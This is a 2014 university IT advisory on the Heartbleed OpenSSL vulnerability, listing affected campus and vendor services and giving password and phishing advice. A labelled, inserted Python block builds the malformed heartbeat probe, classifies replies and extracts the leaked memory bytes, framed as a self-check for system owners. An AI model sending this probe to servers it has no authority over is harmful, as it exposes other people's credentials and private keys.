Applications and Services Affected by the Heartbleed OpenSSL Vulnerability

Many University constituents are concerned about which applications and services they use might be affected by the "Heartbleed"/OpenSSL vulnerability that was publicly disclosed on April 7. This message gives some context and advice on how to determine which services are vulnerable and what to do if they are.

University-run applications and services

Penn's CoSign WebLogin service, the primary web-based authentication method used by Penn websites, is not vulnerable to this issue. Neither are other parts of Penn's central identity and access management infrastructure (e.g., wireless authentication portals).

Any Penn computers determined to be vulnerable were reported immediately and are being patched as quickly as possible. When they are patched, users of these services will be contacted by the system owner if a password change is recommended.
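System owners who need to determine for themselves whether a server they run is affected can probe it directly rather than wait on a version string (distribution packages often backport the fix without changing the reported version). The example below is added here and is not part of the original advisory or of any Penn tool. It builds the malformed TLS heartbeat request that triggers the bug, then classifies a server's reply by checking whether the response carries more payload than the request actually sent. It does no networking: the TLS handshake that must precede the probe is out of scope, and every sample reply is constructed inline for illustration.

```python
# Added example: build a Heartbleed probe record and classify a server's reply.
# Not part of the original advisory. No sockets are opened; the sample replies
# below are constructed here and were not captured from any real host.
import struct

TLS_ALERT = 0x15
TLS_HEARTBEAT = 0x18
HB_REQUEST = 1
HB_RESPONSE = 2
HB_MIN_PADDING = 16   # RFC 6520: heartbeat messages carry at least 16 bytes of padding


def build_heartbeat_probe(tls_version=(3, 2), declared_len=0x4000):
    """Return a TLS record holding a heartbeat request that declares a
    `declared_len`-byte payload but carries none. Unpatched OpenSSL 1.0.1
    through 1.0.1f trusts the declared length and copies that many bytes of
    its own process memory into the response (CVE-2014-0160)."""
    body = struct.pack("!BH", HB_REQUEST, declared_len)            # type, payload_length
    header = struct.pack("!BBBH", TLS_HEARTBEAT, *tls_version, len(body))
    return header + body


def parse_records(data):
    """Split raw bytes into (content_type, (major, minor), body) TLS records.
    A truncated trailing record is returned with whatever bytes arrived."""
    records, i = [], 0
    while i + 5 <= len(data):
        ctype, major, minor, length = struct.unpack("!BBBH", data[i:i + 5])
        records.append((ctype, (major, minor), data[i + 5:i + 5 + length]))
        i += 5 + length
    return records


def classify_response(data, sent_payload_len=0):
    """Classify the bytes a server sent back after the probe.
    'vulnerable': a heartbeat response whose payload_length exceeds what we
        sent and that actually carries those bytes (leaked memory).
    'not_vulnerable': an alert, or a heartbeat response sized to what we sent
        (the RFC 6520 behaviour of a patched implementation).
    'no_heartbeat_response': nothing usable. Patched OpenSSL silently discards
        the malformed request, so a timeout on a live probe lands here too."""
    for ctype, _version, body in parse_records(data):
        if ctype == TLS_ALERT:
            return "not_vulnerable"
        if ctype == TLS_HEARTBEAT and len(body) >= 3:
            hb_type, hb_len = struct.unpack("!BH", body[:3])
            if hb_type == HB_RESPONSE and hb_len > sent_payload_len and len(body) - 3 >= hb_len:
                return "vulnerable"
            return "not_vulnerable"
    return "no_heartbeat_response"


def leaked_bytes(data, sent_payload_len=0):
    """Return the memory a vulnerable server echoed back (empty if none)."""
    for ctype, _version, body in parse_records(data):
        if ctype == TLS_HEARTBEAT and len(body) >= 3:
            hb_type, hb_len = struct.unpack("!BH", body[:3])
            if hb_type == HB_RESPONSE and hb_len > sent_payload_len:
                return body[3 + sent_payload_len:3 + hb_len]
    return b""


# --- constructed sample replies (illustrative only) ---
def sample_vulnerable_reply(declared_len=0x4000):
    # A vulnerable server echoes declared_len bytes of whatever sat in memory.
    leaked = (b"user=alice&pass=hunter2\x00" * 1024)[:declared_len]
    body = struct.pack("!BH", HB_RESPONSE, declared_len) + leaked + b"\x00" * HB_MIN_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, 3, 2, len(body)) + body


def sample_patched_reply():
    # RFC-conformant echo of a zero-length payload: type, length 0, 16 bytes padding.
    body = struct.pack("!BH", HB_RESPONSE, 0) + b"\x00" * HB_MIN_PADDING
    return struct.pack("!BBBH", TLS_HEARTBEAT, 3, 2, len(body)) + body


def sample_alert_reply():
    # fatal (2) unexpected_message (10) alert from a stack that rejects the record.
    return struct.pack("!BBBH", TLS_ALERT, 3, 2, 2) + bytes([2, 10])


if __name__ == "__main__":
    print("probe:", build_heartbeat_probe().hex())
    for name, reply in [("vulnerable", sample_vulnerable_reply()),
                        ("patched", sample_patched_reply()),
                        ("alert", sample_alert_reply()),
                        ("silent", b"")]:
        print(f"{name}: {classify_response(reply)}, {len(leaked_bytes(reply))} bytes leaked")
```

The decisive signal is the length mismatch, not the mere presence of a heartbeat reply: a correct implementation either echoes exactly the payload it received or drops the request, so only a reply carrying more than was sent proves the read ran past the buffer. Treat a silent server as "probably patched, verify with the vendor" rather than as proof, since heartbeats may simply be disabled.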

One University-supported desktop application, WS_FTP Professional 12.x, is currently known to be vulnerable, and is being patched. An updated installer will be made available as soon as possible.

University-affiliated applications and services

The University does business with thousands of third-party vendors, and each one may respond differently to the vulnerability. If you have third-party applications or systems that you are concerned about, the first step is to check with the vendor directly to determine whether they were vulnerable, whether they have remediated the problem, and whether they recommend any additional action for users.

Penn has already determined the status of several key University partners, including:

  • Amazon Web Services has many components; most were not vulnerable, with the specific exceptions noted here:

http://aws.amazon.com/security/security-bulletins/aws-services-updated-to-address-openssl-vulnerability/

  • Box has patched the vulnerability. If you logged into Box by any means other than the University's single sign-on, a password change is recommended.
  • Google has patched the vulnerability. A password change is recommended. Talk to your Local Support Provider if you have questions or concerns about this.

Other applications and services

CNET (a respected technology news site) is maintaining a list of the top 100 most used web sites, whether they were vulnerable, and whether they have been patched. If a site was vulnerable and has been patched, a password change is recommended. Change the password only after the site confirms it is patched; a new password set on a still-vulnerable server can be exposed the same way as the old one. Another good reference is a Mashable article on the same topic.

Of course, many less popular sites will also need to be patched.

For more information

It is a good time to remember that periodic password resets are a best practice all the time, as is using unique passwords for different critical accounts, so that one exposed password does not unlock the others. We continue to encourage all PennKey holders to enroll in Two-Step Verification:

http://www.upenn.edu/computing/weblogin/two-step/

Two-Step Verification mitigates this risk, as well as other attacks (such as phishing), because a stolen password alone is not enough to log in.

Finally, be on the lookout for fraudulent email claiming to be from companies with which you do business (including Penn), as criminals may use this event to create phishing email messages designed to trick people into divulging their passwords. No legitimate party from Penn will ever ask you to share your password, and if a campaign to change PennKey passwords was ever initiated, it would be well-communicated and easily verifiable.

Date Posted: April 15, 2014 Tags: Security, Information Security and Privacy